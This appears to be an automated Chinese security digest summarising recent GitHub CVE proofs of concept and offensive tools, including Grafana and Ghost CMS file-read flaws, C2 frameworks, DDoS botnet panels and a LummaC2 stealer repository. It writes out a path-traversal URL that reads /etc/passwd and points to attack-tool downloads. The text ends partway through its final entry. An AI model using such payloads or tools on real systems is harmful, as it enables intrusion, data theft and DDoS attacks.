* [催更催促快点整理AI合集-速速入群](https://mp.weixin.qq.com/s?__biz=Mzk0NDU1NTA5MA==&mid=2247484496&idx=1&sn=98b304edf163985d5b27995c02b7643e)
|
|||
|
|
* [活动强基固链 | 工业实时数据库测评活动征集](https://mp.weixin.qq.com/s?__biz=MjM5NzYwNDU0Mg==&mid=2649250306&idx=2&sn=0eef464128c688207036c10ee502c29f)
|
|||
|
|
* [实验室真实测评第三弹!深度AI搜索评测,实用性到底几何?](https://mp.weixin.qq.com/s?__biz=MjM5NzYwNDU0Mg==&mid=2649250306&idx=3&sn=16b1bbd53bfc616b889d6d18a5bc7c34)
|
|||
|
|
* [新业务洞见未来,精准决策 | 人工智能(AI)企业尽调咨询服务正式启动](https://mp.weixin.qq.com/s?__biz=MjM5NzYwNDU0Mg==&mid=2649250306&idx=4&sn=fffdad93a7ff046a9ad5fa6c9662c6af)
|
|||
|
|
|
|||
|
|
## 安全分析
|
|||
|
|
(2025-03-07)
|
|||
|
|
|
|||
|
|
本文档包含 AI 对安全相关内容的自动化分析结果。[概览](https://blog.897010.xyz/c/today)
|
|||
|
|
|
|||
|
|
|
|||
|
|
### CVE-2024-49138 - Windows Kernel POC Exploit
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2024-49138 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-06 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-06 17:26:06 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2024-49138-POC](https://github.com/aspire20x/CVE-2024-49138-POC)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该CVE-2024-49138的POC已发布。相关仓库提供了POC的下载链接和简要说明。POC针对Windows内核漏洞,该仓库包含了关于漏洞利用的详细信息,包括下载、启动以及进一步探索的链接。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 提供CVE-2024-49138的POC |
|
|||
|
|
| 2 | POC包含可下载的利用程序 |
|
|||
|
|
| 3 | 相关仓库提供下载链接和说明 |
|
|||
|
|
| 4 | POC针对Windows内核漏洞 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> POC利用程序
|
|||
|
|
|
|||
|
|
> 下载和运行POC的步骤
|
|||
|
|
|
|||
|
|
> 利用Windows内核的漏洞
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Windows Kernel
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
POC的存在,表明漏洞可能存在实际可利用性。虽然漏洞具体细节未知,但POC的发布提高了漏洞的价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2024-38014 - HTA文件远程命令执行漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2024-38014 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-06 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-06 16:45:45 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2024-38014](https://github.com/Anurag-Chevendra/CVE-2024-38014)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该POC利用HTA文件中的VBScript代码,在用户打开HTML页面时执行任意命令。具体来说,`index.hta` 文件中包含VBScript代码,该代码通过`wscript.Shell.run`函数启动计算器。`index.html`文件用于加载`index.hta`文件。`INSTRUCTIONS.txt`文件提示用户修改`.url`文件中的IP地址,这表明攻击者可以通过控制`.url`文件的内容来引导受害者执行恶意代码。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | HTA文件执行任意命令 |
|
|||
|
|
| 2 | 通过HTML页面加载HTA文件 |
|
|||
|
|
| 3 | POC包含计算器启动 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> HTA文件执行VBScript代码,实现远程代码执行
|
|||
|
|
|
|||
|
|
> HTML页面加载HTA文件
|
|||
|
|
|
|||
|
|
> POC包含启动计算器的代码
|
|||
|
|
|
|||
|
|
> 攻击者可能通过修改`.url`文件来引导受害者执行恶意代码
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• HTA
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该POC提供了一个可执行的漏洞利用,展示了通过HTA文件进行远程代码执行的可能性,并且有明确的POC代码和利用方法,满足了判断为valuable的条件。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2021-43798 - Grafana 任意文件读取漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2021-43798 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `漏洞利用可用` |
|
|||
|
|
| 发布时间 | 2025-03-06 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-06 18:40:07 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2021-43798-Grafana-Arbitrary-File-Read](https://github.com/monke443/CVE-2021-43798-Grafana-Arbitrary-File-Read)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该漏洞(CVE-2021-43798)存在于Grafana 8.0.0 - 8.3.0版本中,允许未经身份验证的攻击者通过路径穿越漏洞读取服务器上的任意文件。利用该漏洞,攻击者可以构造恶意请求,访问位于`/public/plugins/<plugin>`路径之外的敏感文件,例如`/etc/passwd`等。提供的POC脚本可以自动探测漏洞并进行文件读取。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Grafana 任意文件读取漏洞 |
|
|||
|
|
| 2 | 通过路径穿越访问敏感文件 |
|
|||
|
|
| 3 | 提供完整的Python利用脚本 |
|
|||
|
|
| 4 | 影响版本明确 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:Grafana在处理插件请求时,未充分验证用户提供的路径,导致路径穿越漏洞。
|
|||
|
|
|
|||
|
|
> 利用方法:攻击者构造特定的URL,利用路径穿越(例如:`/public/plugins/alertGroups/../../../../../../../../etc/passwd`)来读取服务器上的任意文件。提供的Python脚本可以自动化该过程。
|
|||
|
|
|
|||
|
|
> 修复方案:升级到Grafana 8.3.1、8.2.7、8.1.8或8.0.7及以上版本,或禁用可能受影响的插件。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Grafana
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响广泛使用的Grafana,且有明确的受影响版本和可用的POC,可以读取服务器上的敏感文件,危害较大。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2023-40028 - Ghost CMS symlink 漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2023-40028 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-07 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-07 00:52:19 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2023-40028](https://github.com/syogod/CVE-2023-40028)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
CVE-2023-40028是影响Ghost CMS 5.59.1之前版本的安全漏洞。该漏洞允许已认证的用户上传符号链接文件,从而导致服务器上任意文件的读取。最新提交提供了一个POC,演示了如何通过上传一个指向/etc/passwd的符号链接来读取文件内容。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Ghost CMS 文件上传漏洞 |
|
|||
|
|
| 2 | 允许上传symlink文件 |
|
|||
|
|
| 3 | 可导致任意文件读取 |
|
|||
|
|
| 4 | 需要已认证的账号 |
|
|||
|
|
| 5 | 影响版本明确 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理: Ghost CMS在处理文件上传时,未充分过滤上传文件类型和内容,允许上传symlink文件。攻击者可以通过构造指向服务器敏感文件的symlink,从而实现任意文件读取。
|
|||
|
|
|
|||
|
|
> 利用方法: 攻击者需要一个有效的Ghost CMS账户。上传一个包含指向目标敏感文件的symlink的zip压缩包。上传成功后,访问该symlink指向的文件即可读取文件内容。POC提供了完整的利用代码。
|
|||
|
|
|
|||
|
|
> 修复方案: 升级到Ghost CMS 5.59.1或更高版本。该版本修复了此漏洞。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Ghost CMS < 5.59.1
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响广泛使用的CMS系统,存在明确的受影响版本和POC,可以导致敏感信息泄露。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Rce-Client - Minecraft RCE 客户端新增命令系统
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Rce-Client](https://github.com/Zalgo-Dev/Rce-Client) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `GENERAL_UPDATE` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **7**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该项目为Minecraft客户端增加了命令系统,允许用户通过聊天输入命令来控制客户端行为。虽然当前未发现直接的RCE利用,但命令系统的引入为后续潜在的漏洞利用提供了基础。如果命令处理逻辑存在安全问题,可能导致客户端被恶意控制。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 新增了命令系统,允许玩家在游戏中执行命令。 |
|
|||
|
|
| 2 | 引入了 `Command` 接口和 `CommandManager` 类来管理和执行命令。 |
|
|||
|
|
| 3 | 实现了 `HelpCommand` 命令,用于显示可用命令列表。 |
|
|||
|
|
| 4 | 通过Mixin技术,拦截聊天消息,将以指定前缀开头的消息作为命令处理。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 新增了 `Command` 接口,定义了命令的结构和执行方法。
|
|||
|
|
|
|||
|
|
> 新增了 `CommandManager` 类,负责注册、管理和执行命令,支持命令前缀,例如: `?`。
|
|||
|
|
|
|||
|
|
> 新增了 `HelpCommand` 命令,用于列出可用命令。
|
|||
|
|
|
|||
|
|
> 使用Mixin技术注入 `ChatScreen.sendMessage` 方法,拦截聊天消息,如果消息以命令前缀开头,则执行命令。
|
|||
|
|
|
|||
|
|
> 移除了 `ExampleMixin`,添加了 `ChatMixin`。
|
|||
|
|
|
|||
|
|
> 修改了 `rceclient.mixins.json`。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Minecraft Client
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
新增的命令系统提供了客户端控制能力,虽然当前没有发现直接的安全风险,但为后续的漏洞注入、恶意代码执行提供了可能,具有潜在的安全价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### TOP - CVE POC及代码审计资源
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [TOP](https://github.com/GhostTroops/TOP) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `POC更新` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库更新了多个CVE编号的POC链接,特别是增加了CVE-2025-21298的POC信息。同时更新了README.md和Top_Codeql.md文件。这些POC可能用于漏洞利用,具有一定的安全风险。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 更新了多个CVE编号的POC链接。 |
|
|||
|
|
| 2 | 更新了CVE-2025-21298的POC信息。 |
|
|||
|
|
| 3 | README.md和Top_Codeql.md文件的更新。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> README.md 文件增加了多个CVE的POC链接,便于安全研究人员快速获取。
|
|||
|
|
|
|||
|
|
> Top_Codeql.md 文件可能更新了CodeQL相关的0day信息。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 多个软件版本
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
更新了多个CVE编号的POC链接,其中包括CVE-2025-21298,对于安全研究人员具有较高的参考价值,可以用于漏洞挖掘和安全评估。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Horus - Horus C2框架
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Horus](https://github.com/17tayyy/Horus) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `GENERAL_UPDATE` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **4**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
Horus是一个C2框架,用于管理僵尸网络并发起DDoS攻击。本次更新主要为README.md文件的修改和删除,虽然更新内容本身不直接涉及安全漏洞或防护措施,但C2框架本身就属于安全研究的重要领域,因此具有研究价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Horus是一个C2框架,用于控制僵尸网络并发起DDoS攻击 |
|
|||
|
|
| 2 | 更新主要内容为删除和修改README.md文件 |
|
|||
|
|
| 3 | 该项目是C2框架,与安全研究具有强相关性 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 项目核心功能是C2面板,允许管理员管理僵尸网络和发起攻击
|
|||
|
|
|
|||
|
|
> 更新的文件是README.md,可能包含项目描述、使用说明和安全配置等信息
|
|||
|
|
|
|||
|
|
> C2框架是攻击者常用的工具,用于控制受感染的机器并发起攻击。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• CNC panel
|
|||
|
|
• Botnet clients
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目是C2框架,属于安全研究领域的重要内容,虽然更新内容本身不直接涉及安全问题,但C2框架本身具有研究价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### LummaC2-Stealer - LummaC2恶意软件分析
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [LummaC2-Stealer](https://github.com/ijustwantmoneyonhypixel/LummaC2-Stealer) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `GENERAL_UPDATE` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了对LummaC2恶意软件的分析,包括提取的二进制文件和分析报告,更新修改了README.md文件中的下载链接,指向了包含提取的二进制文件的ZIP文件。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 分析了LummaC2恶意软件 |
|
|||
|
|
| 2 | 提供了提取的二进制文件 |
|
|||
|
|
| 3 | 更新了下载链接 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> README.md文件中的下载链接被更新,指向了包含提取二进制文件的Application.zip文件。
|
|||
|
|
|
|||
|
|
> 提供的二进制文件和分析可能有助于理解LummaC2的工作原理和检测方法。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• LummaC2
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库包含对C2框架(LummaC2)的分析,提供了提取的二进制文件,这有助于安全研究人员了解恶意软件的运作方式和检测方法,具有一定的价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### C2Panel - 免费DDoS僵尸网络控制面板
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [C2Panel](https://github.com/ronnisron/C2Panel) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库更新了C2Panel的下载链接,表明可能发布了新版本的软件。由于C2Panel是用于DDoS攻击的控制面板,因此任何更新都值得关注,可能包含了新的攻击功能或改进。该项目明确鼓励用户进行DDoS攻击。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | C2Panel是一个免费的僵尸网络控制面板。 |
|
|||
|
|
| 2 | 更新修改了下载链接,可能包含新版本软件。 |
|
|||
|
|
| 3 | 该软件用于DDoS攻击。 |
|
|||
|
|
| 4 | C2Panel可能被用于恶意目的。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 更新了README.md文件中的下载链接,指向了v2.0版本的软件。
|
|||
|
|
|
|||
|
|
> 该软件的功能是控制僵尸网络发起DDoS攻击。
|
|||
|
|
|
|||
|
|
> 由于其用于DDoS攻击,具有潜在的恶意用途。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• C2Panel软件
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
C2Panel是用于DDoS攻击的工具,更新版本可能包含新的攻击功能,对目标系统具有潜在的威胁。该项目明确鼓励进行DDoS攻击,因此具有很高的安全风险。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### BitStrike - Java C2框架更新,HTTP协议
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [BitStrike](https://github.com/TheBitty/BitStrike) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **10**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
BitStrike C2框架更新,移除了旧的通信协议,新增了HTTP通信协议实现,并增加了README文件,方便用户使用。代码更新包括服务器配置、C2服务器和agent等。该更新增强了框架的功能,特别是通信机制的灵活性和隐蔽性,并增强了安全性。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 新增HTTP通信协议 |
|
|||
|
|
| 2 | C2服务器和Agent代码更新 |
|
|||
|
|
| 3 | README文件补充C2框架信息 |
|
|||
|
|
| 4 | 增加了TLS/SSL等加密通信特性 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 移除了 CommunicationProtocol 文件,该文件可能包含旧的通信实现
|
|||
|
|
|
|||
|
|
> 新增了 HTTPCommunicationProtocol 文件,实现了基于HTTP的通信机制,包括 User-Agent 伪装,并且使用Base64加密以及 AES-GCM加密,以增加隐蔽性
|
|||
|
|
|
|||
|
|
> 更新了CustomSocket 文件,增加了socket的输入输出
|
|||
|
|
|
|||
|
|
> 增加了TLS/SSL/WebSockets相关的内容
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• C2 Server
|
|||
|
|
• Agent
|
|||
|
|
• Communication Protocol
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该更新改进了C2框架的通信协议,增强了隐蔽性,对于渗透测试和C2框架的安全性有重要意义。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### AI-Powered-Security-Scanner - AI钓鱼诈骗文本检测
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [AI-Powered-Security-Scanner](https://github.com/Rachel2001/AI-Powered-Security-Scanner) |
|
|||
|
|
| 风险等级 | `LOW` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `新增项目` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **121**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个基于AI的Web工具,用于扫描文本,以检测潜在的钓鱼和诈骗尝试。该工具利用OpenAI的GPT模型分析文本并识别可疑内容。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 使用AI检测钓鱼和诈骗文本 |
|
|||
|
|
| 2 | 基于OpenAI GPT模型 |
|
|||
|
|
| 3 | 提供Web界面 |
|
|||
|
|
| 4 | 与搜索关键词'AI+Security'高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用Flask框架构建Web界面
|
|||
|
|
|
|||
|
|
> 使用OpenAI API进行文本分析
|
|||
|
|
|
|||
|
|
> 包含requirements.txt,说明了依赖项
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Flask
|
|||
|
|
• OpenAI API
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目与'AI+Security'高度相关,实现了使用AI进行安全检测的功能,具备一定的研究价值,且代码质量尚可,符合价值判断标准。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### STARLINK-testing-project - Starlink前端安全测试
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [STARLINK-testing-project](https://github.com/SergioUS/STARLINK-testing-project) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全测试` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该更新添加了前端安全测试用例。这些测试用例使用Selenium框架,针对Starlink的前端功能,如登录和订单流程,进行安全相关的自动化测试,以发现潜在的安全漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 新增了安全测试用例 |
|
|||
|
|
| 2 | 测试可能存在的安全漏洞,例如登录和订单流程 |
|
|||
|
|
| 3 | 使用了 Selenium 进行 Web 自动化测试 |
|
|||
|
|
| 4 | 测试用例包括登录、订单流程等 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用了Selenium Webdriver进行UI自动化测试。
|
|||
|
|
|
|||
|
|
> 测试用例覆盖了用户登录、订单流程等核心功能。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Front-end Testing
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
新增安全测试用例,对项目安全性有积极作用。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### PhantomX - Golang EDR规避框架
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [PhantomX](https://github.com/mawg0ud/PhantomX) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全功能` |
